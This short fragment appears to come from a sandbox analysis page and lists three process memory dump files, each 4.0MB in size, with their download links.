4.0MB

Download
memory/4968-0-0x00007FF6F9310000-0x00007FF6F9706000-memory.dmp

Filesize
4.0MB

Download
memory/5040-767-0x00007FF68BC90000-0x00007FF68C086000-memory.dmp

Filesize
4.0MB

Download
memory/5040-1545-0x00007FF68BC90000-0x00007FF68C086000-memory.dmp

Filesize
4.0MB

Download